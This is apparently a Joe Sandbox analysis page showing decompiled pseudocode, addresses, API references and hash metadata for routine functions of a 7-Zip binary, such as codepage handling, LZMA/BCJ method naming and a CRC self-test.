										 *(_t203 +  *( *(_t203 - 0x30) +  *( *((intOrPtr*)(_t200 + 0x20)) + _t195 * 8) * 4) * 4 - 0xd0) =  *(_t203 +  *( *(_t203 - 0x30) +  *( *((intOrPtr*)(_t200 + 0x20)) + _t195 * 8) * 4) * 4 - 0xd0) | _t151 <<  *( *(_t203 - 0x44) + ( *((intOrPtr*)(_t200 + 0x20)) + _t195 * 8)[1] * 4);
										_t195 = _t195 + 1;
									} while (_t195 <  *((intOrPtr*)(_t200 + 0x1c)));
									_t150 = 0;
								}
								 *(_t203 - 4) = 1;
								E00408604(_t203 - 0x50);
								 *(_t203 - 4) =  *(_t203 - 4) | 0xffffffff;
								E00408604(_t203 - 0x3c);
								_t180 = _t203 - 0xd0;
								 *(_t203 - 0x14) = 0x20;
								do {
									 *(_t203 - 0x10) = _t150;
									_t202 = _t203 - 0xd0;
									do {
										_t129 =  *_t180;
										_t196 = 1;
										if((_t129 & _t196 <<  *(_t203 - 0x10)) != 0) {
											 *_t180 = _t129 |  *_t202;
										}
										 *(_t203 - 0x10) =  *(_t203 - 0x10) + 1;
										_t202 =  &(_t202[1]);
									} while ( *(_t203 - 0x10) < 0x20);
									_t180 =  &(_t180[1]);
									_t106 = _t203 - 0x14;
									 *_t106 =  *(_t203 - 0x14) - 1;
								} while ( *_t106 != 0);
								_t130 = _t203 - 0xd0;
								while(1) {
									_t181 = 1;
									if(( *_t130 & _t181 << _t150) != 0) {
										goto L31;
									}
									_t150 = _t150 + 1;
									_t130 =  &(_t130[1]);
									if(_t150 < 0x20) {
										continue;
									} else {
										_t118 = 1;
									}
									goto L32;
								}
								goto L31;
							} else {
								while(E0042CFD0(_t203 - 0x28,  *((intOrPtr*)( *((intOrPtr*)(_t200 + 0x20)) + 4 + _t192 * 8))) == 0) {
									_t192 = _t192 + 1;
									if(_t192 <  *((intOrPtr*)(_t200 + 0x1c))) {
										continue;
									} else {
										goto L11;
									}
									goto L32;
								}
								goto L30;
							}
						} else {
							while(E0042CFD0(_t203 - 0x28,  *((intOrPtr*)( *((intOrPtr*)(_t200 + 0x34)) + _t191 * 4))) == 0) {
								_t191 = _t191 + 1;
								if(_t191 <  *((intOrPtr*)(_t200 + 0x30))) {
									continue;
								} else {
									goto L8;
								}
								goto L32;
							}
							goto L30;
						}
					} else {
						while(E0042CFD0(_t203 - 0x28,  *((intOrPtr*)( *((intOrPtr*)(_t200 + 0x20)) + _t190 * 8))) == 0) {
							_t190 = _t190 + 1;
							if(_t190 <  *((intOrPtr*)(_t200 + 0x1c))) {
								continue;
							} else {
								goto L5;
							}
							goto L32;
						}
						L30:
						 *(_t203 - 4) =  *(_t203 - 4) | 0xffffffff;
						E00408604(_t203 - 0x28);
						goto L31;
					}
				}
				L32:
				 *[fs:0x0] =  *((intOrPtr*)(_t203 - 0xc));
				return _t118;
			}

0x0042cd82
0x0042cd8f
0x0042cd98
0x0042cf99
0x0042cf99
0x0042cda8
0x0042cdad
0x0042cdb2
0x0042cdbf
0x0042cdc7
0x0042cdca
0x0042cdcf
0x0042cdd4
0x0042cdf2
0x0042cdf2
0x0042cdf7
0x0042ce15
0x0042ce1b
0x0042ce20
0x0042ce25
0x0042ce44
0x0042ce44
0x0042ce4b
0x0042ce54
0x0042ce5b
0x0042ce64
0x0042ce65
0x0042ce68
0x0042ce6b
0x0042ce6e
0x0042ce71
0x0042ce74
0x0042ce7b
0x0042ce7e
0x0042ce81
0x0042ce84
0x0042ce87
0x0042ce8d
0x0042ce91
0x0042ce94
0x0042ce96
0x0042ce9c
0x0042ce9f
0x0042cea5
0x0042cea7
0x0042cead
0x0042ceb2
0x0042ceb8
0x0042cea7
0x0042cec0
0x0042cec3
0x0042cec5
0x0042cecb
0x0042ced0
0x0042ced6
0x0042cec5
0x0042cedb
0x0042cee1
0x0042ce96
0x0042cee6
0x0042ceeb
0x0042ceed
0x0042cefb
0x0042cf11
0x0042cf13
0x0042cf14
0x0042cf19
0x0042cf19
0x0042cf1e
0x0042cf22
0x0042cf27
0x0042cf2e
0x0042cf33
0x0042cf39
0x0042cf40
0x0042cf40
0x0042cf43
0x0042cf49
0x0042cf4c
0x0042cf50
0x0042cf55
0x0042cf59
0x0042cf59
0x0042cf5b
0x0042cf5e
0x0042cf61
0x0042cf67
0x0042cf6a
0x0042cf6a
0x0042cf6a
0x0042cf6f
0x0042cf75
0x0042cf79
0x0042cf7e
0x00000000
0x00000000
0x0042cf80
0x0042cf81
0x0042cf87
0x00000000
0x0042cf89
0x0042cf89
0x0042cf89
0x00000000
0x0042cf87
0x00000000
0x0042ce27
0x0042ce27
0x0042ce3e
0x0042ce42
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0042ce42
0x00000000
0x0042ce27
0x0042cdf9
0x0042cdf9
0x0042ce0f
0x0042ce13
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0042ce13
0x00000000
0x0042cdf9
0x0042cdd6
0x0042cdd6
0x0042cdec
0x0042cdf0
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0042cdf0
0x0042cf8d
0x0042cf8d
0x0042cf94
0x00000000
0x0042cf94
0x0042cdd4
0x0042cf9b
0x0042cfa1
0x0042cfa9

APIs

__EH_prolog.LIBCMT ref: 0042CD82

Strings

, xrefs: 0042CF61
, xrefs: 0042CF39

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: H_prolog
String ID: $
API String ID: 3519838083-227171996
Opcode ID: a76aadd02c451df5a530bc4837ced833aeb8ce480aed34779acfe00049131935
Instruction ID: 5d0b406c18202b3f46059241855fa713d8f087d48a2dc57dffdc94942331e0a4
Opcode Fuzzy Hash: a76aadd02c451df5a530bc4837ced833aeb8ce480aed34779acfe00049131935
Instruction Fuzzy Hash: A871AB71A0021ACFCB20CF99E5C0AEEB7B2FF48318F51456ED416A7291D734AA46CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00471A83 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00471A83(void* __ebx, void* __edi) {
				char _v17;
				signed char _v18;
				struct _cpinfo _v24;
				char _v280;
				char _v536;
				char _v792;
				char _v1304;
				void* _t43;
				char _t44;
				signed char _t45;
				void* _t55;
				signed int _t56;
				signed char _t64;
				intOrPtr* _t66;
				signed int _t68;
				signed int _t70;
				signed int _t71;
				signed char _t76;
				signed char _t77;
				signed char* _t78;
				void* _t81;
				void* _t87;
				void* _t88;

				if(GetCPInfo( *0x496228,  &_v24) == 1) {
					_t44 = 0;
					do {
						 *((char*)(_t87 + _t44 - 0x114)) = _t44;
						_t44 = _t44 + 1;
					} while (_t44 < 0x100);
					_t45 = _v18;
					_v280 = 0x20;
					if(_t45 == 0) {
						L9:
						E00472375(1,  &_v280, 0x100,  &_v1304,  *0x496228,  *0x496444, 0);
						E00472126( *0x496444, 0x100,  &_v280, 0x100,  &_v536, 0x100,  *0x496228, 0);
						E00472126( *0x496444, 0x200,  &_v280, 0x100,  &_v792, 0x100,  *0x496228, 0);
						_t55 = 0;
						_t66 =  &_v1304;
						do {
							_t76 =  *_t66;
							if((_t76 & 0x00000001) == 0) {
								if((_t76 & 0x00000002) == 0) {
									 *(_t55 + 0x496240) =  *(_t55 + 0x496240) & 0x00000000;
									goto L16;
								}
								 *(_t55 + 0x496341) =  *(_t55 + 0x496341) | 0x00000020;
								_t77 =  *((intOrPtr*)(_t87 + _t55 - 0x314));
								L12:
								 *(_t55 + 0x496240) = _t77;
								goto L16;
							}
							 *(_t55 + 0x496341) =  *(_t55 + 0x496341) | 0x00000010;
							_t77 =  *((intOrPtr*)(_t87 + _t55 - 0x214));
							goto L12;
							L16:
							_t55 = _t55 + 1;
							_t66 = _t66 + 2;
						} while (_t55 < 0x100);
						return _t55;
					}
					_t78 =  &_v17;
					do {
						_t68 =  *_t78 & 0x000000ff;
						_t56 = _t45 & 0x000000ff;
						if(_t56 <= _t68) {
							_t81 = _t87 + _t56 - 0x114;
							_t70 = _t68 - _t56 + 1;
							_t71 = _t70 >> 2;
							memset(_t81 + _t71, memset(_t81, 0x20202020, _t71 << 2), (_t70 & 0x00000003) << 0);
							_t88 = _t88 + 0x18;
						}
						_t78 =  &(_t78[2]);
						_t45 =  *((intOrPtr*)(_t78 - 1));
					} while (_t45 != 0);
					goto L9;
				}
				_t43 = 0;
				do {
					if(_t43 < 0x41 || _t43 > 0x5a) {
						if(_t43 < 0x61 || _t43 > 0x7a) {
							 *(_t43 + 0x496240) =  *(_t43 + 0x496240) & 0x00000000;
						} else {
							 *(_t43 + 0x496341) =  *(_t43 + 0x496341) | 0x00000020;
							_t64 = _t43 - 0x20;
							goto L22;
						}
					} else {
						 *(_t43 + 0x496341) =  *(_t43 + 0x496341) | 0x00000010;
						_t64 = _t43 + 0x20;
						L22:
						 *(_t43 + 0x496240) = _t64;
					}
					_t43 = _t43 + 1;
				} while (_t43 < 0x100);
				return _t43;
			}

0x00471aa0
0x00471aa6
0x00471aad
0x00471aad
0x00471ab4
0x00471ab5
0x00471ab9
0x00471abc
0x00471ac5
0x00471afe
0x00471b1d
0x00471b41
0x00471b69
0x00471b71
0x00471b73
0x00471b79
0x00471b79
0x00471b7f
0x00471b9a
0x00471bac
0x00000000
0x00471bac
0x00471b9c
0x00471ba3
0x00471b8f
0x00471b8f
0x00000000
0x00471b8f
0x00471b81
0x00471b88
0x00000000
0x00471bb3
0x00471bb3
0x00471bb5
0x00471bb6
0x00000000
0x00471b79
0x00471ac9
0x00471acc
0x00471acc
0x00471acf
0x00471ad4
0x00471ad8
0x00471adf
0x00471ae7
0x00471af1
0x00471af1
0x00471af1
0x00471af4
0x00471af5
0x00471af8
0x00000000
0x00471afd
0x00471bbc
0x00471bc3
0x00471bc6
0x00471be4
0x00471bf9
0x00471beb
0x00471beb
0x00471bf4
0x00000000
0x00471bf4
0x00471bcd
0x00471bcd
0x00471bd6
0x00471bd9
0x00471bd9
0x00471bd9
0x00471c00
0x00471c01
0x00471c07

APIs

GetCPInfo.KERNEL32(?), ref: 00471A97

Strings

, xrefs: 00471AE0
, xrefs: 00471ABC

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: Info
String ID: $
API String ID: 1807457897-3032137957
Opcode ID: 82b9ebace977c017a322e84a017c4c799c7629dd4772566940a67c68c2466b10
Instruction ID: 5c3e5dd18d5ca2b0f7a6e0339bafee86ed4275ccb2fec3f011e76292e71c390b
Opcode Fuzzy Hash: 82b9ebace977c017a322e84a017c4c799c7629dd4772566940a67c68c2466b10
Instruction Fuzzy Hash: 2E4189310042981AEB269768DD49BFB7FECEB06704F1404F7D94DC6272D2798948CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 0041C936 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0041C936(void* __ecx, void* __edx) {
				intOrPtr _t59;
				void* _t69;
				intOrPtr _t77;
				intOrPtr _t78;
				void* _t89;
				void* _t96;
				void* _t98;
				void* _t99;
				void* _t100;
				void* _t101;
				void* _t103;

				_t89 = __edx;
				E0046B890(E00475600, _t103);
				_t99 = __edx;
				E004039C0(_t103 - 0x18, __ecx);
				_t2 = _t103 - 4;
				 *(_t103 - 4) =  *(_t103 - 4) & 0x00000000;
				E004054FE(_t103 - 0x18, _t89,  *_t2, 0xa);
				E00405529(_t103 - 0x18, _t89,  *_t2, _t99);
				E004054FE(_t103 - 0x18, _t89,  *_t2, 0xa);
				E00405529(_t103 - 0x18, _t89,  *_t2,  *((intOrPtr*)(_t103 + 8)));
				_t77 = _t103 - 0x24;
				E004039C0(_t77, _t103 - 0x18);
				E0046B8F4(_t103 - 0x24, 0x481390);
				_t100 = _t98;
				E0046B890(E00475614, _t103);
				_t69 = _t89;
				 *((intOrPtr*)(_t103 - 0x14)) = _t77;
				_t59 =  *((intOrPtr*)(_t69 + 8));
				_t78 = 1;
				if(_t59 > _t78) {
					_push(_t100);
					 *((intOrPtr*)(_t103 - 0x10)) = _t78;
					_t101 = 0;
					do {
						_t17 = _t101 + 4; // 0x4
						_t96 = _t17;
						if(E0040881C( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x14)) + 0xc)) +  *(_t101 +  *((intOrPtr*)(_t69 + 0xc))) * 4)),  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x14)) + 0xc)) +  *(_t96 +  *((intOrPtr*)(_t69 + 0xc))) * 4))) == 0) {
							E00403532(_t103 - 0x20,  *0x48c33c);
							 *(_t103 - 4) =  *(_t103 - 4) & 0x00000000;
							_push( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x14)) + 0xc)) +  *(_t96 +  *((intOrPtr*)(_t69 + 0xc))) * 4)));
							E0041C936(_t103 - 0x20,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x14)) + 0xc)) +  *(_t101 +  *((intOrPtr*)(_t69 + 0xc))) * 4)));
							 *(_t103 - 4) =  *(_t103 - 4) | 0xffffffff;
							E00407A18( *((intOrPtr*)(_t103 - 0x20)));
						}
						 *((intOrPtr*)(_t103 - 0x10)) =  *((intOrPtr*)(_t103 - 0x10)) + 1;
						_t101 = _t96;
						_t59 =  *((intOrPtr*)(_t103 - 0x10));
					} while (_t59 <  *((intOrPtr*)(_t69 + 8)));
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t103 - 0xc));
				return _t59;
			}

0x0041c936
0x0041c93b
0x0041c945
0x0041c94a
0x0041c94f
0x0041c94f
0x0041c958
0x0041c961
0x0041c96b
0x0041c976
0x0041c97e
0x0041c982
0x0041c990
0x0041c995
0x0041c99b
0x0041c9a4
0x0041c9a6
0x0041c9ab
0x0041c9ae
0x0041c9b1
0x0041c9b3
0x0041c9b5
0x0041c9b8
0x0041c9ba
0x0041c9c0
0x0041c9c0
0x0041c9d9
0x0041c9e4
0x0041c9ef
0x0041ca02
0x0041ca08
0x0041ca0d
0x0041ca14
0x0041ca19
0x0041ca1a
0x0041ca1d
0x0041ca1f
0x0041ca22
0x0041ca28
0x0041ca2d
0x0041ca35

APIs

__EH_prolog.LIBCMT ref: 0041C93B

Part of subcall function 0046B8F4: RaiseException.KERNEL32(0047CF70,?,00405CA1,?,?,?,0047CF70,?,?,?,00405CA1), ref: 0046B922

__EH_prolog.LIBCMT ref: 0041C99B

Strings

59@, xrefs: 0041C9A3

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: H_prolog$ExceptionRaise
String ID: 59@
API String ID: 2062786585-2780377667
Opcode ID: 07de3d3b167dcc8360909bc0b69281976f0f0c2475f3a3f050a51cf107d52f9e
Instruction ID: a6f31d39d81224240f44a0bd5d30bed56bf58cfd7ee645fd7ff7855bc7c346c4
Opcode Fuzzy Hash: 07de3d3b167dcc8360909bc0b69281976f0f0c2475f3a3f050a51cf107d52f9e
Instruction Fuzzy Hash: 3F31A531A105059BCB14EF99C8829EEB779FF48314F50402EE906B7292DB38AE42CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0041F985 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E0041F985() {
				void* _t37;
				intOrPtr _t38;
				signed int _t42;
				void* _t44;
				intOrPtr _t45;
				void* _t48;
				signed int _t59;
				intOrPtr _t72;
				void* _t73;

				E0046B890(E00475ABC, _t73);
				 *((short*)(_t73 - 0x1c)) = 0;
				 *((short*)(_t73 - 0x1a)) = 0;
				 *(_t73 - 4) = 0;
				_t37 =  *((intOrPtr*)(_t73 + 0x10)) - 7;
				if(_t37 == 0) {
					_t38 =  *((intOrPtr*)(_t73 + 8));
					__eflags =  *((intOrPtr*)(_t38 + 0x3c));
					if(__eflags != 0) {
						_t59 =  *(_t38 + 0x10);
						_t42 =  *(_t38 + 0x14);
						__eflags = (_t59 & _t42) - 0xffffffff;
						if(__eflags != 0) {
							_push(_t42);
							_push(_t59);
							goto L14;
						}
					}
				} else {
					_t44 = _t37 - 1;
					if(_t44 == 0) {
						_t45 =  *((intOrPtr*)(_t73 + 8));
						__eflags =  *((intOrPtr*)(_t45 + 0x38));
						if(__eflags != 0) {
							_push( *((intOrPtr*)(_t45 + 0x34)));
							_push( *((intOrPtr*)(_t45 + 0x30)));
							L14:
							E0040C1C0(_t73 - 0x1c);
						}
					} else {
						if(_t44 == 0xe) {
							_t72 =  *((intOrPtr*)(_t73 + 8));
							if( *((intOrPtr*)(_t72 + 0x3c)) != 0) {
								 *((char*)(_t73 - 0x5c)) = 0;
								if( *((intOrPtr*)(_t72 + 0x18)) != 0) {
									E0041FABD(_t73 - 0x5c, 0x48c724);
								}
								E0041FABD(_t73 - 0x5c, 0x48c71c);
								_t48 = 0;
								if( *((intOrPtr*)(_t73 - 0x5c)) != 0) {
									do {
										_t48 = _t48 + 1;
										_t84 =  *((intOrPtr*)(_t73 + _t48 - 0x5c));
									} while ( *((intOrPtr*)(_t73 + _t48 - 0x5c)) != 0);
								}
								E0041FA61( *((intOrPtr*)(_t72 + 0x1a)), _t73 + _t48 - 0x5c);
								E0040C0D3(_t73 - 0x1c, _t84, _t73 - 0x5c);
							}
						}
					}
				}
				E0040C2B2(_t73 - 0x1c, _t84,  *((intOrPtr*)(_t73 + 0x14)));
				 *(_t73 - 4) =  *(_t73 - 4) | 0xffffffff;
				E0040C20F(_t73 - 0x1c);
				 *[fs:0x0] =  *((intOrPtr*)(_t73 - 0xc));
				return 0;
			}

0x0041f98a
0x0041f996
0x0041f99a
0x0041f9a1
0x0041f9a4
0x0041f9a7
0x0041fa17
0x0041fa1a
0x0041fa1d
0x0041fa1f
0x0041fa22
0x0041fa29
0x0041fa2c
0x0041fa2e
0x0041fa2f
0x00000000
0x0041fa2f
0x0041fa2c
0x0041f9a9
0x0041f9a9
0x0041f9aa
0x0041fa07
0x0041fa0a
0x0041fa0d
0x0041fa0f
0x0041fa12
0x0041fa30
0x0041fa33
0x0041fa33
0x0041f9ac
0x0041f9af
0x0041f9b5
0x0041f9bb
0x0041f9c0
0x0041f9c3
0x0041f9cd
0x0041f9cd
0x0041f9da
0x0041f9df
0x0041f9e4
0x0041f9e6
0x0041f9e6
0x0041f9e7
0x0041f9e7
0x0041f9e6
0x0041f9f4
0x0041fa00
0x0041fa00
0x0041f9bb
0x0041f9af
0x0041f9aa
0x0041fa3e
0x0041fa43
0x0041fa4a
0x0041fa56
0x0041fa5e

APIs

__EH_prolog.LIBCMT ref: 0041F98A

Strings

LZMA:, xrefs: 0041F9D2
BCJ , xrefs: 0041F9C5

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: H_prolog
String ID: BCJ $LZMA:
API String ID: 3519838083-462996315
Opcode ID: f5aaf2dcd8d2c36660c37db49121751ca9f9939531ab36ddaff5a2b567419d6b
Instruction ID: 4fee4bf0a5429e26f45d53a1c5358177aa4f1e25947415e94ebe7a5a98c2da02
Opcode Fuzzy Hash: f5aaf2dcd8d2c36660c37db49121751ca9f9939531ab36ddaff5a2b567419d6b
Instruction Fuzzy Hash: D821AB72D10249DFCB14EFA5C5908EE7B71AF10340B50817EE026AB696D73CA98BCB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040816E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040816E(intOrPtr __ecx, short** __edx, void* __edi, void* __eflags) {
				intOrPtr _t36;
				int _t42;
				char* _t54;
				void* _t61;
				short** _t65;
				void* _t68;

				E0046B890(E00473818, _t68);
				 *((intOrPtr*)(_t68 - 0x10)) = __ecx;
				_t65 = __edx;
				 *((intOrPtr*)(_t68 - 0x18)) = 0;
				 *(_t68 - 0x24) = 0;
				 *(_t68 - 0x20) = 0;
				 *((intOrPtr*)(_t68 - 0x1c)) = 0;
				E00401EEE(_t68 - 0x24, 3);
				 *((intOrPtr*)(_t68 - 4)) = 0;
				 *((char*)( *((intOrPtr*)(_t68 + 0x10)))) = 0;
				_t36 =  *((intOrPtr*)(__edx + 4));
				if(_t36 != 0) {
					_t61 = _t36 + _t36;
					if(_t61 >=  *((intOrPtr*)(_t68 - 0x1c))) {
						E00401EEE(_t68 - 0x24, _t61);
					}
					_t54 = _t68 + 0xc;
					_t42 = WideCharToMultiByte( *(_t68 + 8), 0,  *_t65, _t65[1],  *(_t68 - 0x24), _t61 + 1, _t54, _t68 - 0x14);
					 *((char*)( *((intOrPtr*)(_t68 + 0x10)))) = _t54 & 0xffffff00 |  *(_t68 - 0x14) != 0x00000000;
					if(_t42 == 0) {
						 *((intOrPtr*)(_t68 + 0x10)) = 0x44e75;
						_t42 = E0046B8F4(_t68 + 0x10, 0x47e128);
					}
					( *(_t68 - 0x24))[_t42] = 0;
					 *(_t68 - 0x20) = _t42;
				}
				E00401E64( *((intOrPtr*)(_t68 - 0x10)), _t68 - 0x24);
				E00407A18( *(_t68 - 0x24));
				 *[fs:0x0] =  *((intOrPtr*)(_t68 - 0xc));
				return  *((intOrPtr*)(_t68 - 0x10));
			}

0x00408173
0x0040817c
0x00408182
0x00408189
0x0040818c
0x0040818f
0x00408192
0x00408195
0x0040819d
0x004081a0
0x004081a2
0x004081a7
0x004081aa
0x004081b0
0x004081b6
0x004081b6
0x004081c4
0x004081d3
0x004081e5
0x004081e7
0x004081f2
0x004081f9
0x004081f9
0x00408201
0x00408204
0x00408204
0x0040820e
0x00408216
0x00408224
0x0040822c

APIs

__EH_prolog.LIBCMT ref: 00408173
WideCharToMultiByte.KERNEL32(?,00000000,?,00000004,00000003,00000001,?,00000000,59@,00000003,?,00000000,00407F1C,00000000), ref: 004081D3

Strings

59@, xrefs: 004081A9

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: ByteCharH_prologMultiWide
String ID: 59@
API String ID: 3731712410-2780377667
Opcode ID: 3e30b8be08c219df50001418e773fcd6df8581cd43d08f32ffd015183181abdc
Instruction ID: af53ffafe5e3b4cbac78d31c94e9b62b0eb73677ea79480e45141f723c5d0b6c
Opcode Fuzzy Hash: 3e30b8be08c219df50001418e773fcd6df8581cd43d08f32ffd015183181abdc
Instruction Fuzzy Hash: 24213C72900249DFCB14DF99C9819EEBBF8FF49300B50446EE815B7251C739AE04CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00414B6B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00414B6B(void* __eflags) {
				char _t32;
				void* _t37;
				char _t39;
				void* _t55;
				intOrPtr _t58;
				void* _t59;

				E0046B890(E00474780, _t59);
				_t39 = 0;
				 *((intOrPtr*)(_t59 - 0x20)) = 0;
				 *((intOrPtr*)(_t59 - 0x28)) = 0x47aacc;
				 *((intOrPtr*)(_t59 - 4)) = 0;
				if(E00413C1F(_t59 - 0x28, 0x500) != 0) {
					_t58 =  *((intOrPtr*)(_t59 - 0x20));
					_t32 = 0;
					do {
						 *((char*)(_t32 + _t58)) = _t32;
						_t32 = _t32 + 1;
					} while (_t32 < 0x100);
					if(E00414C43(_t32, _t58, 0x100) == 0x29058c73) {
						 *((intOrPtr*)(_t59 - 0x1c)) = 0x159a55e5;
						 *((intOrPtr*)(_t59 - 0x18)) = 0x1f123bb5;
						E00414C74(_t58 + 0x100, 0x400, _t59 - 0x1c);
						 *((intOrPtr*)(_t59 - 0x14)) = 0;
						do {
							_t36 =  *((intOrPtr*)(_t59 - 0x14));
							 *(_t59 - 0x10) =  *(_t59 - 0x10) & 0x00000000;
							_t55 =  *((intOrPtr*)(_t59 - 0x14)) + _t58;
							while(1) {
								_t37 = E00414C43(_t36, _t55,  *(_t59 - 0x10));
								if(_t37 != E0046B1C0(_t55,  *(_t59 - 0x10))) {
									break;
								}
								 *(_t59 - 0x10) =  *(_t59 - 0x10) + 1;
								if( *(_t59 - 0x10) < 0x20) {
									continue;
								} else {
									goto L8;
								}
								goto L10;
							}
							_t39 = 0;
							goto L10;
							L8:
							 *((intOrPtr*)(_t59 - 0x14)) =  *((intOrPtr*)(_t59 - 0x14)) + 1;
						} while ( *((intOrPtr*)(_t59 - 0x14)) < 0x4e0);
						_t39 = 1;
					}
				}
				L10:
				 *((intOrPtr*)(_t59 - 0x28)) = 0x47aacc;
				E004585E0( *((intOrPtr*)(_t59 - 0x20)));
				 *[fs:0x0] =  *((intOrPtr*)(_t59 - 0xc));
				return _t39;
			}

0x00414b70
0x00414b79
0x00414b7d
0x00414b80
0x00414b8f
0x00414b99
0x00414b9f
0x00414ba2
0x00414ba9
0x00414ba9
0x00414bac
0x00414bad
0x00414bbd
0x00414bce
0x00414bd5
0x00414bdc
0x00414be1
0x00414be4
0x00414be4
0x00414be7
0x00414beb
0x00414bee
0x00414bf3
0x00414c06
0x00000000
0x00000000
0x00414c08
0x00414c0f
